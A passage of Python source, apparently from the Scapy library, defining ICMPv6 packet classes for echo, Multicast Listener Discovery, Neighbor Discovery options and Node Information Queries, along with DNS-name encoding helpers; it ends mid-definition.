ICMPv6ParamProblem(_ICMPv6Error): name = "ICMPv6 Parameter Problem" fields_desc = [ByteEnumField("type", 4, icmp6types), ByteEnumField( "code", 0, {0: "erroneous header field encountered", 1: "unrecognized Next Header type encountered", 2: "unrecognized IPv6 option encountered", 3: "first fragment has incomplete header chain"}), XShortField("cksum", None), IntField("ptr", 6)] class ICMPv6EchoRequest(_ICMPv6): name = "ICMPv6 Echo Request" fields_desc = [ByteEnumField("type", 128, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", 0), XShortField("seq", 0), StrField("data", "")] def mysummary(self): return self.sprintf("%name% (id: %id% seq: %seq%)") def hashret(self): return struct.pack("HH", self.id, self.seq) + self.payload.hashret() class ICMPv6EchoReply(ICMPv6EchoRequest): name = "ICMPv6 Echo Reply" type = 129 def answers(self, other): # We could match data content between request and reply. 
return (isinstance(other, ICMPv6EchoRequest) and self.id == other.id and self.seq == other.seq and self.data == other.data) # ICMPv6 Multicast Listener Discovery (RFC2710) # # tous les messages MLD sont emis avec une adresse source lien-locale # -> Y veiller dans le post_build si aucune n'est specifiee # La valeur de Hop-Limit doit etre de 1 # "and an IPv6 Router Alert option in a Hop-by-Hop Options # header. (The router alert option is necessary to cause routers to # examine MLD messages sent to multicast addresses in which the router # itself has no interest" class _ICMPv6ML(_ICMPv6): fields_desc = [ByteEnumField("type", 130, icmp6types), ByteField("code", 0), XShortField("cksum", None), ShortField("mrd", 0), ShortField("reserved", 0), IP6Field("mladdr", "::")] # general queries are sent to the link-scope all-nodes multicast # address ff02::1, with a multicast address field of 0 and a MRD of # [Query Response Interval] # Default value for mladdr is set to 0 for a General Query, and # overloaded by the user for a Multicast Address specific query # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Query" type = 130 mrd = 10000 # 10s for mrd mladdr = "::" overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Report" type = 131 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} def answers(self, query): """Check the query type""" return ICMPv6MLQuery in query # When a node ceases to listen to a multicast address on an interface, # it SHOULD send a single Done message to the link-scope all-routers # multicast address (FF02::2), carrying in its multicast address field # the address to which it is ceasing to listen # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Done" type = 132 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} # Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 name = "MLDv2 - Multicast Listener Query" fields_desc = [ByteEnumField("type", 130, icmp6types), ByteField("code", 0), XShortField("cksum", None), ShortField("mrd", 10000), ShortField("reserved", 0), IP6Field("mladdr", "::"), BitField("Resv", 0, 4), BitField("S", 0, 1), BitField("QRV", 0, 3), ByteField("QQIC", 0), ShortField("sources_number", None), IP6ListField("sources", [], count_from=lambda pkt: pkt.sources_number)] # RFC8810 - 4. 
Message Formats overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} def post_build(self, packet, payload): """Compute the 'sources_number' field when needed""" if self.sources_number is None: srcnum = struct.pack("!H", len(self.sources)) packet = packet[:26] + srcnum + packet[28:] return _ICMPv6.post_build(self, packet, payload) class ICMPv6MLDMultAddrRec(Packet): name = "ICMPv6 MLDv2 - Multicast Address Record" fields_desc = [ByteField("rtype", 4), FieldLenField("auxdata_len", None, length_of="auxdata", fmt="B"), FieldLenField("sources_number", None, length_of="sources", adjust=lambda p, num: num // 16), IP6Field("dst", "::"), IP6ListField("sources", [], length_from=lambda p: 16 * p.sources_number), StrLenField("auxdata", "", length_from=lambda p: p.auxdata_len)] def default_payload_class(self, packet): """Multicast Address Record followed by another one""" return self.__class__ class ICMPv6MLReport2(_ICMPv6): # RFC 3810 name = "MLDv2 - Multicast Listener Report" fields_desc = [ByteEnumField("type", 143, icmp6types), ByteField("res", 0), XShortField("cksum", None), ShortField("reserved", 0), ShortField("records_number", None), PacketListField("records", [], ICMPv6MLDMultAddrRec, count_from=lambda p: p.records_number)] # RFC8810 - 4. Message Formats overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} def post_build(self, packet, payload): """Compute the 'records_number' field when needed""" if self.records_number is None: recnum = struct.pack("!H", len(self.records)) packet = packet[:6] + recnum + packet[8:] return _ICMPv6.post_build(self, packet, payload) def answers(self, query): """Check the query type""" return isinstance(query, ICMPv6MLQuery2) # ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # # TODO: # - 04/09/06 troglocan : find a way to automatically add a router alert # option for all MRD packets. This could be done in a specific # way when IPv6 is the under layer with some specific keyword # like 'exthdr'. This would allow to keep compatibility with # providing IPv6 fields to be overloaded in fields_desc. # # At the moment, if user inserts an IPv6 Router alert option # none of the IPv6 default values of IPv6 layer will be set. 
class ICMPv6MRD_Advertisement(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Advertisement" fields_desc = [ByteEnumField("type", 151, icmp6types), ByteField("advinter", 20), XShortField("cksum", None), ShortField("queryint", 0), ShortField("robustness", 0)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:8], s[8:] class ICMPv6MRD_Solicitation(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Solicitation" fields_desc = [ByteEnumField("type", 152, icmp6types), ByteField("res", 0), XShortField("cksum", None)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] class ICMPv6MRD_Termination(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Termination" fields_desc = [ByteEnumField("type", 153, icmp6types), ByteField("res", 0), XShortField("cksum", None)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] # ICMPv6 Neighbor Discovery (RFC 2461) # icmp6ndopts = {1: "Source Link-Layer Address", 2: "Target Link-Layer Address", 3: "Prefix Information", 4: "Redirected Header", 5: "MTU", 6: "NBMA Shortcut Limit Option", # RFC2491 7: "Advertisement Interval Option", 8: "Home Agent Information Option", 9: "Source Address List", 10: "Target Address List", 11: "CGA Option", # RFC 3971 12: "RSA Signature Option", # RFC 3971 13: "Timestamp Option", # RFC 3971 14: "Nonce option", # RFC 3971 15: "Trust Anchor Option", # RFC 3971 16: "Certificate Option", # RFC 3971 17: "IP Address Option", # RFC 4068 18: "New Router Prefix Information Option", # RFC 4068 19: "Link-layer Address Option", # RFC 4068 20: "Neighbor Advertisement Acknowledgement Option", 21: "CARD Request Option", # RFC 4065/4066/4067 22: "CARD Reply Option", # RFC 4065/4066/4067 23: "MAP Option", # RFC 4140 24: "Route Information Option", # RFC 4191 25: "Recursive DNS Server Option", 26: "IPv6 Router Advertisement Flags Option" } icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 2: "ICMPv6NDOptDstLLAddr", 3: "ICMPv6NDOptPrefixInfo", 4: "ICMPv6NDOptRedirectedHdr", 5: "ICMPv6NDOptMTU", 6: "ICMPv6NDOptShortcutLimit", 7: "ICMPv6NDOptAdvInterval", 8: "ICMPv6NDOptHAInfo", 9: "ICMPv6NDOptSrcAddrList", 10: "ICMPv6NDOptTgtAddrList", # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py # 15: Do Me, # 16: Do Me, 17: "ICMPv6NDOptIPAddr", 18: "ICMPv6NDOptNewRtrPrefix", 19: "ICMPv6NDOptLLA", # 18: Do Me, # 19: Do Me, # 20: Do Me, # 21: Do Me, # 22: Do Me, 23: "ICMPv6NDOptMAP", 24: "ICMPv6NDOptRouteInfo", 25: "ICMPv6NDOptRDNSS", 26: "ICMPv6NDOptEFA", 31: "ICMPv6NDOptDNSSL" } icmp6ndraprefs = {0: "Medium (default)", 1: "High", 2: "Reserved", 3: "Low"} # RFC 4191 class _ICMPv6NDGuessPayload: name = "Dummy ND class that implements guess_payload_class()" def guess_payload_class(self, p): if len(p) > 1: return icmp6ndoptscls.get(orb(p[0]), Raw) # s/Raw/ICMPv6NDOptUnknown/g ? # noqa: E501 # Beginning of ICMPv6 Neighbor Discovery Options. 
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" fields_desc = [ByteField("type", None), FieldLenField("len", None, length_of="data", fmt="B", adjust=lambda pkt, x: x + 2), StrLenField("data", "", length_from=lambda pkt: pkt.len - 2)] # NOTE: len includes type and len field. Expressed in unit of 8 bytes # TODO: Revoir le coup du ETHER_ANY class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" fields_desc = [ByteField("type", 1), ByteField("len", 1), MACField("lladdr", ETHER_ANY)] def mysummary(self): return self.sprintf("%name% %lladdr%") class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" type = 2 class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Prefix Information" fields_desc = [ByteField("type", 3), ByteField("len", 4), ByteField("prefixlen", None), BitField("L", 1, 1), BitField("A", 1, 1), BitField("R", 0, 1), BitField("res1", 0, 5), XIntField("validlifetime", 0xffffffff), XIntField("preferredlifetime", 0xffffffff), XIntField("res2", 0x00000000), IP6Field("prefix", "::")] def mysummary(self): return self.sprintf("%name% %prefix%/%prefixlen% " "On-link %L% Autonomous Address %A% " "Router Address %R%") # TODO: We should also limit the size of included packet to something # like (initiallen - 40 - 2) class TruncPktLenField(PacketLenField): __slots__ = ["cur_shift"] def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): # noqa: E501 PacketLenField.__init__(self, name, default, cls, length_from=length_from) # noqa: E501 self.cur_shift = cur_shift def getfield(self, pkt, s): tmp_len = self.length_from(pkt) i = self.m2i(pkt, s[:tmp_len]) return s[tmp_len:], i def m2i(self, pkt, m): s = None try: # It can happen we have sth shorter than 40 bytes s = self.cls(m) except Exception: return conf.raw_layer(m) return s def i2m(self, pkt, x): s = raw(x) tmp_len = len(s) r = (tmp_len + self.cur_shift) % 8 tmp_len = tmp_len - r return s[:tmp_len] def i2len(self, pkt, i): return len(self.i2m(pkt, i)) # Faire un post_build pour le recalcul de la taille (en multiple de 8 octets) class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Redirected Header" fields_desc = [ByteField("type", 4), FieldLenField("len", None, length_of="pkt", fmt="B", adjust=lambda pkt, x:(x + 8) // 8), StrFixedLenField("res", b"\x00" * 6, 6), TruncPktLenField("pkt", b"", IPv6, 8, length_from=lambda pkt: 8 * pkt.len - 8)] # See which value should be used for default MTU instead of 1280 class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - MTU" fields_desc = [ByteField("type", 5), ByteField("len", 1), XShortField("res", 0), IntField("mtu", 1280)] def mysummary(self): return self.sprintf("%name% %mtu%") class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" fields_desc = [ByteField("type", 6), ByteField("len", 1), ByteField("shortcutlim", 40), # XXX ByteField("res1", 0), IntField("res2", 0)] class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Interval Advertisement" fields_desc = [ByteField("type", 7), ByteField("len", 1), ShortField("res", 0), IntField("advint", 0)] def mysummary(self): return self.sprintf("%name% %advint% 
milliseconds") class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Home Agent Information" fields_desc = [ByteField("type", 8), ByteField("len", 1), ShortField("res", 0), ShortField("pref", 0), ShortField("lifetime", 1)] def mysummary(self): return self.sprintf("%name% %pref% %lifetime% seconds") # type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support # type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" fields_desc = [ByteField("type", 17), ByteField("len", 3), ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 2: "New Care-Of Address", 3: "NAR's IP address"}), ByteField("plen", 64), IntField("res", 0), IP6Field("addr", "::")] class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 fields_desc = [ByteField("type", 18), ByteField("len", 3), ByteField("optcode", 0), ByteField("plen", 64), IntField("res", 0), IP6Field("prefix", "::")] _rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1: "LLA for the new AP", 2: "LLA of the MN", 3: "LLA of the NAR", 4: "LLA of the src of TrSolPr or PrRtAdv msg", 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 6: "No preifx info available for AP identified by the LLA", # noqa: E501 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 fields_desc = [ByteField("type", 19), ByteField("len", 1), ByteEnumField("optcode", 0, _rfc4068_lla_optcode), MACField("lla", ETHER_ANY)] # We only support ethernet class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 name = "ICMPv6 Neighbor Discovery - MAP Option" fields_desc = [ByteField("type", 23), ByteField("len", 3), BitField("dist", 1, 4), BitField("pref", 15, 4), # highest availability BitField("R", 1, 1), BitField("res", 0, 7), IntField("validlifetime", 0xffffffff), IP6Field("addr", "::")] class _IP6PrefixField(IP6Field): __slots__ = ["length_from"] def __init__(self, name, default): IP6Field.__init__(self, name, default) self.length_from = lambda pkt: 8 * (pkt.len - 1) def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) def getfield(self, pkt, s): tmp_len = self.length_from(pkt) p = s[:tmp_len] if tmp_len < 16: p += b'\x00' * (16 - tmp_len) return s[tmp_len:], self.m2i(pkt, p) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) def i2m(self, pkt, x): tmp_len = pkt.len if x is None: x = "::" if tmp_len is None: tmp_len = 1 x = inet_pton(socket.AF_INET6, x) if tmp_len is None: return x if tmp_len in [0, 1]: return b"" if tmp_len in [2, 3]: return x[:8 * (tmp_len - 1)] return x + b'\x00' * 8 * (tmp_len - 3) class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" fields_desc = [ByteField("type", 24), FieldLenField("len", None, length_of="prefix", fmt="B", adjust=lambda pkt, x: x // 8 + 1), ByteField("plen", None), BitField("res1", 0, 3), BitEnumField("prf", 0, 2, icmp6ndraprefs), BitField("res2", 0, 3), IntField("rtlifetime", 0xffffffff), _IP6PrefixField("prefix", None)] def mysummary(self): return self.sprintf("%name% %prefix%/%plen% Preference 
%prf%") class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" fields_desc = [ByteField("type", 25), FieldLenField("len", None, count_of="dns", fmt="B", adjust=lambda pkt, x: 2 * x + 1), ShortField("res", None), IntField("lifetime", 0xffffffff), IP6ListField("dns", [], length_from=lambda pkt: 8 * (pkt.len - 1))] def mysummary(self): return self.sprintf("%name% " + ", ".join(self.dns)) class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" fields_desc = [ByteField("type", 26), ByteField("len", 1), BitField("res", 0, 48)] # As required in Sect 8. of RFC 3315, Domain Names must be encoded as # described in section 3.1 of RFC 1035 # XXX Label should be at most 63 octets in length : we do not enforce it # Total length of domain should be 255 : we do not enforce it either class DomainNameListField(StrLenField): __slots__ = ["padded"] islist = 1 padded_unit = 8 def __init__(self, name, default, fld=None, length_from=None, padded=False): # noqa: E501 self.padded = padded StrLenField.__init__(self, name, default, fld, length_from) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) def m2i(self, pkt, x): x = plain_str(x) # Decode bytes to string res = [] while x: # Get a name until \x00 is reached cur = [] while x and ord(x[0]) != 0: tmp_len = ord(x[0]) cur.append(x[1:tmp_len + 1]) x = x[tmp_len + 1:] if self.padded: # Discard following \x00 in padded mode if len(cur): res.append(".".join(cur) + ".") else: # Store the current name res.append(".".join(cur) + ".") if x and ord(x[0]) == 0: x = x[1:] return res def i2m(self, pkt, x): def conditionalTrailingDot(z): if z and orb(z[-1]) == 0: return z return z + b'\x00' # Build the encode names tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) # In padded mode, add some \x00 bytes if self.padded and not len(ret_string) % self.padded_unit == 0: ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 return ret_string class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" fields_desc = [ByteField("type", 31), FieldLenField("len", None, length_of="searchlist", fmt="B", adjust=lambda pkt, x: 1 + x // 8), ShortField("res", None), IntField("lifetime", 0xffffffff), DomainNameListField("searchlist", [], length_from=lambda pkt: 8 * pkt.len - 8, padded=True) ] def mysummary(self): return self.sprintf("%name% " + ", ".join(self.searchlist)) # End of ICMPv6 Neighbor Discovery Options. 
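# Usage sketch (illustrative addition, not part of the original module): a
# Router Advertisement built from the message class defined below and several
# of the ND options defined above. The prefix, MTU, DNS server and search-list
# values are arbitrary examples.
#
#   >>> ra = (IPv6(dst="ff02::1")
#   ...       / ICMPv6ND_RA(routerlifetime=1800)
#   ...       / ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
#   ...       / ICMPv6NDOptMTU(mtu=1500)
#   ...       / ICMPv6NDOptRDNSS(dns=["2001:db8::53"], lifetime=300)
#   ...       / ICMPv6NDOptDNSSL(searchlist=["example.net."], lifetime=300))
#   >>> # send(ra)   # would emit the RA to all nodes on the default interface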
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Solicitation" fields_desc = [ByteEnumField("type", 133, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("res", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Advertisement" fields_desc = [ByteEnumField("type", 134, icmp6types), ByteField("code", 0), XShortField("cksum", None), ByteField("chlim", 0), BitField("M", 0, 1), BitField("O", 0, 1), BitField("H", 0, 1), BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 BitField("P", 0, 1), BitField("res", 0, 2), ShortField("routerlifetime", 1800), IntField("reachabletime", 0), IntField("retranstimer", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def answers(self, other): return isinstance(other, ICMPv6ND_RS) def mysummary(self): return self.sprintf("%name% Lifetime %routerlifetime% " "Hop Limit %chlim% Preference %prf% " "Managed %M% Other %O% Home %H%") class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" fields_desc = [ByteEnumField("type", 135, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("res", 0), IP6Field("tgt", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return bytes_encode(self.tgt) + self.payload.hashret() class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" fields_desc = [ByteEnumField("type", 136, icmp6types), ByteField("code", 0), XShortField("cksum", None), BitField("R", 1, 1), BitField("S", 0, 1), BitField("O", 1, 1), XBitField("res", 0, 29), IP6Field("tgt", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return bytes_encode(self.tgt) + self.payload.hashret() def answers(self, other): return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt # associated possible options : target link-layer option, Redirected header class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Redirect" fields_desc = [ByteEnumField("type", 137, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("res", 0), IP6Field("tgt", "::"), IP6Field("dst", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} # ICMPv6 Inverse Neighbor Discovery (RFC 3122) # class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" fields_desc = [ByteField("type", 9), FieldLenField("len", None, count_of="addrlist", fmt="B", adjust=lambda pkt, x: 2 * x + 1), StrFixedLenField("res", b"\x00" * 6, 6), IP6ListField("addrlist", [], length_from=lambda pkt: 8 * (pkt.len - 1))] class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" type = 10 # RFC3122 # Required options: source lladdr and target lladdr # Other valid options: source address list, MTU # - As stated in the document, it would be nice to take the L2 address # requested in the mandatory target lladdr option and use it as the # Ethernet destination address when none is specified # - that does not seem very practical if the user has to specify all
# the options. # Ether() must use the target lladdr as destination class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Inverse Neighbor Discovery Solicitation" fields_desc = [ByteEnumField("type", 141, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("reserved", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} # Required options: target lladdr, target address list # Other valid options: MTU class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Inverse Neighbor Discovery Advertisement" fields_desc = [ByteEnumField("type", 142, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("reserved", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} ############################################################################### # ICMPv6 Node Information Queries (RFC 4620) ############################################################################### # [ ] Add automatic destination address computation using computeNIGroupAddr # in IPv6 class (Scapy6 modification when integrated) if : # - it is not provided # - upper layer is ICMPv6NIQueryName() with a valid value # [ ] Try to be liberal in what we accept as internal values for _explicit_ # DNS elements provided by users. Any string should be considered # valid and kept like it has been provided. At the moment, i2repr() will # crash on many inputs # [ ] Do the documentation # [ ] Add regression tests # [ ] Perform tests against real machines (NOOP reply is proof of implementation). # noqa: E501 # [ ] Check if there are differences between different stacks. Among *BSD, # with others. # [ ] Deal with flags in a consistent way. # [ ] Implement compression in names2dnsrepr() and decompression in # dnsrepr2names(). Should be possible to disable. icmp6_niqtypes = {0: "NOOP", 2: "Node Name", 3: "IPv6 Address", 4: "IPv4 Address"} class _ICMPv6NIHashret: def hashret(self): return bytes_encode(self.nonce) class _ICMPv6NIAnswers: def answers(self, other): return self.nonce == other.nonce # Buggy; always returns the same value during a session class NonceField(StrFixedLenField): def __init__(self, name, default=None): StrFixedLenField.__init__(self, name, default, 8) if default is None: self.default = self.randval() @conf.commands.register def computeNIGroupAddr(name): """Compute the NI group Address. Can take a FQDN as input parameter""" name = name.lower().split(".")[0] record = chr(len(name)) + name h = md5(record.encode("utf8")) h = h.digest() addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) return addr # Here is the deal. First, that protocol is a piece of shit. Then, we # provide 4 classes for the different kinds of Requests (one for every # valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same # data field class that is made to be smart by guessing the specific # type of value provided : # # - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, # if not overridden by user # - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, # if not overridden # - Name in the other cases: code is set to 1, if not overridden by user # # Internal storage is not only the value, but a pair providing # the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@) # # Note : I merged getfield() and m2i(). m2i() should not be called # directly anyway. 
Same remark for addfield() and i2m() # # -- arno # "The type of information present in the Data field of a query is # declared by the ICMP Code, whereas the type of information in a # Reply is determined by the Qtype" def names2dnsrepr(x): """ Take as input a list of DNS names or a single DNS name and encode it in DNS format (with possible compression) If a string that is already a DNS name in DNS format is passed, it is returned unmodified. Result is a string. !!! At the moment, compression is not implemented !!! """ if isinstance(x, bytes): if x and x[-1:] == b'\x00': # stupid heuristic return x x = [x] res = [] for n in x: termin = b"\x00" if n.count(b'.') == 0: # single-component gets one more termin += b'\x00' n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin res.append(n) return b"".join(res) def dnsrepr2names(x): """ Take as input a DNS encoded string (possibly compressed) and returns a list of DNS names contained in it. If provided string is already in printable format (does not end with a null character, a one element list is returned). Result is a list. """ res = [] cur = b"" while x: tmp_len = orb(x[0]) x = x[1:] if not tmp_len: if cur and cur[-1:] == b'.': cur = cur[:-1] res.append(cur) cur = b"" if x and orb(x[0]) == 0: # single component x = x[1:] continue if tmp_len & 0xc0: # XXX TODO : work on that -- arno raise Exception("DNS message can't be compressed at this point!") cur += x[:tmp_len] + b"." x = x[tmp_len:] return res class NIQueryDataField(StrField): def __init__(self, name, default): StrField.__init__(self, name, default) def i2h(self, pkt, x): if x is None: return x t, val = x if t == 1: val = dnsrepr2names(val)[0] return val def h2i(self, pkt, x): if x is tuple and isinstance(x[0], int): return x # Try IPv6 try: inet_pton(socket.AF_INET6, x.decode()) return (0, x.decode()) except Exception: pass # Try IPv4 try: inet_pton(socket.AF_INET, x.decode()) return (2, x.decode()) except Exception: pass # Try DNS if x is None: x = b"" x = names2dnsrepr(x) return (1, x) def i2repr(self, pkt, x): t, val = x if t == 1: # DNS Name # we don't use dnsrepr2names() to deal with # possible weird data extracted info res = [] while val: tmp_len = orb(val[0]) val = val[1:] if tmp_len == 0: break res.append(plain_str(val[:tmp_len]) + ".") val = val[tmp_len:] tmp = "".join(res) if tmp and tmp[-1] == '.': tmp = tmp[:-1] return tmp return repr(val) def getfield(self, pkt, s): qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, b"") else: code = getattr(pkt, "code") if code == 0: # IPv6 Addr return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) elif code == 2: # IPv4 Addr return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) else: # Name or Unknown return b"", (1, s) def addfield(self, pkt, s, val): if ((isinstance(val, tuple) and val[1] is None) or val is None): val = (1, b"") t = val[0] if t == 1: return s + val[1] elif t == 0: return s + inet_pton(socket.AF_INET6, val[1]) else: return s + inet_pton(socket.AF_INET, val[1]) class NIQueryCodeField(ByteEnumField): def i2m(self, pkt, x): if x is None: d = pkt.getfieldval("data") if d is None: return 1 elif d[0] == 0: # IPv6 address return 0 elif d[0] == 1: # Name return 1 elif d[0] == 2: # IPv4 address return 2 else: return 1 return x _niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} # _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", # 8: "Link-local addresses", 16: "Site-local addresses", # 32: "Global addresses" } # "This NI type has no defined flags and never has a Data Field". 
Used # to know if the destination is up and implements NI protocol. class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Query - NOOP Query" fields_desc = [ByteEnumField("type", 139, icmp6types), NIQueryCodeField("code", None, _niquery_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIQueryDataField("data", None)] class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Name Query" qtype = 2 # We ask for the IPv6 address of the peer class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Address Query" qtype = 3 flags = 0x3E class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv4 Address Query" qtype = 4 _nireply_code = {0: "Successful Reply", 1: "Response Refusal", 3: "Unknown query type"} _nireply_flags = {1: "Reply set incomplete", 2: "All unicast addresses", 4: "IPv4 addresses", 8: "Link-local addresses", 16: "Site-local addresses", 32: "Global addresses"} # Internal repr is one of those : # (0, "some string") : unknown qtype value are mapped to that one # (3, 